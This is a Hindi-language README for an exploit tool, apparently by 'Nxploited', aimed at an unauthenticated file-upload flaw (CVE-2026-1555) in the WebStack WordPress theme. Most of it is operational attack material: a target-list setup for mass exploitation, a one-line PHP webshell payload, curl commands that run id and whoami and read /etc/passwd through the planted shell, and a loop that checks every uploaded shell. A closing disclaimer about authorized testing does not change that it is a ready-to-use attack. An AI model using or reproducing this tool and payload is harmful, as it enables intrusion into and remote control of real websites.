
WebStack <= 1.2024 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
WebStack <= 1.2024 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
img_upload AJAX हैंडलर के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
WordPress के admin-ajax.php एक्शन हुक img_upload के अंतर्गत पंजीकृत io_img_upload() फ़ंक्शन, अपलोड की गई फ़ाइल को सर्वर पर लिखने से पहले कोई भी फ़ाइल प्रकार या एक्सटेंशन सत्यापन नहीं करता है। चूँकि यह एक्शन प्रमाणीकरण जाँच (wp_ajax_nopriv_) के बिना पंजीकृत है, कोई भी बिना प्रमाणीकरण वाला रिमोट हमलावर एक मनमाना फ़ाइल — जिसमें PHP वेबशेल भी शामिल है — POST कर सकता है, और सर्वर इसे सार्वजनिक रूप से सुलभ पथ में संग्रहीत करेगा, जिससे सीधे रिमोट कोड निष्पादन संभव हो जाता है।
संवेदनशील एंडपॉइंट:
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>
uploaded_paths.txt में सहेजे जाते हैंPython संस्करण: 3.8+
निर्भरताएँ स्थापित करें:
pip install requests rich urllib3
list.txt (या आपकी पसंद का कोई भी नाम) नामक एक फ़ाइल बनाएं, जिसमें प्रति पंक्ति एक लक्ष्य हो:
https://target1.com
https://target2.com
http://target3.com
जिन लक्ष्यों में
http://याhttps://नहीं है, उनमें स्वचालित रूप सेhttp://जोड़ दिया जाता है।
अपना वेबशेल स्क्रिप्ट के समान निर्देशिका में रखें। उदाहरण:
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python CVE-2026-1555.py
आपसे निम्नलिखित के लिए पूछा जाएगा:
प्रत्येक सफल अपलोड यह प्रिंट करता है:
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful │
│ │
│ Target: https://target.com │
│ Shell URL: https://target.com/wp-content/... │
╰────────────────────────────────────────────────╯
सभी सफल शेल URL इसमें जोड़ दिए जाते हैं:
uploaded_paths.txt
सफल अपलोड के बाद, ब्राउज़र या curl के माध्यम से सीधे शेल तक पहुँचें:
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id
# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"
# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"
सटीक अपलोड पथ सर्वर के JSON प्रतिक्रिया (
data.src) से निकाला जाता है और स्वचालित रूप से प्रिंट किया जाता है।
आउटपुट फ़ाइल से सभी अपलोड किए गए शेल को त्वरित रूप से सत्यापित करें:
while read url; do
echo -n "[*] $url -> "
curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt
प्रत्येक रन के अंत में, एक सारांश प्रिंट किया जाता है:
Summary 50/50 OK: 12 FAIL: 38
╭──────────────────────────────────────────╮
│ Shell URLs saved to uploaded_paths.txt │
╰──────────────────────────────────────────╯
CVE-2026-1555.py ← Main exploit script
list.txt ← Target URLs (one per line)
shell.php ← Payload to upload
uploaded_paths.txt ← Auto-generated: successful shell URLs
यह टूल केवल अधिकृत पैठ परीक्षण, सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए सख्ती से प्रदान किया गया है।
लेखक — Nxploited — इस टूल का उपयोग करके किए गए किसी भी दुरुपयोग, क्षति या अवैध गतिविधि के लिए कोई ज़िम्मेदारी नहीं लेता है। इस टूल का उपयोग करके, आप पुष्टि करते हैं कि आपके पास सभी लक्ष्य प्रणालियों का परीक्षण करने की स्पष्ट लिखित अनुमति है।
उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है, अवैध है और लागू साइबर अपराध कानूनों के तहत आपराधिक अभियोजन हो सकता है।
जिम्मेदारी से उपयोग करें। आप अपने कार्यों के लिए पूर्ण रूप से उत्तरदायी हैं।
👤 लेखक: Nxploited 📣 चैनल: Nxploited ZeroDay Hub 💬 टेलीग्राम: @KNxploited
| फ़ील्ड | विवरण |
|---|
| CVE आईडी | CVE-2026-1555 |
| प्रभावित घटक | WordPress के लिए WebStack थीम |
| संवेदनशील संस्करण | 1.2024 तक के सभी संस्करण |
| भेद्यता प्रकार | मनमाना फ़ाइल अपलोड → रिमोट कोड निष्पादन |
| प्रमाणीकरण आवश्यक | ❌ नहीं (बिना प्रमाणीकरण) |
| CVSS स्कोर | 9.8 क्रिटिकल |
| CVSS वेक्टर | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| प्रॉम्प्ट | विवरण | डिफ़ॉल्ट |
|---|
Targets file | आपकी लक्ष्य सूची का पथ | list.txt |
Threads | समवर्ती कार्यकर्ताओं की संख्या | 6 |
Local file to upload | आपके पेलोड का फ़ाइल नाम (स्क्रिप्ट डिर में) | shell.php |